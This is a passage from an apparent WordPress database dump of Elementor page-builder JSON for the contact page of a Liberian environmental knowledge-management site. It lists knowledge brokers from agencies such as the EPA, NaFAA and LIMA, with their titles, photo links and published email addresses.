href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23471,3414,'_elementor_edit_mode','builder'),(23472,3414,'_elementor_template_type','wp-page'),(23473,3414,'_elementor_version','3.0.16'),(23474,3414,'_wp_page_template','default'),(23475,3414,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Uriah Garsinii <\\/strong>\\nLand Use Management Manager <\\/br>\\nLLA\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\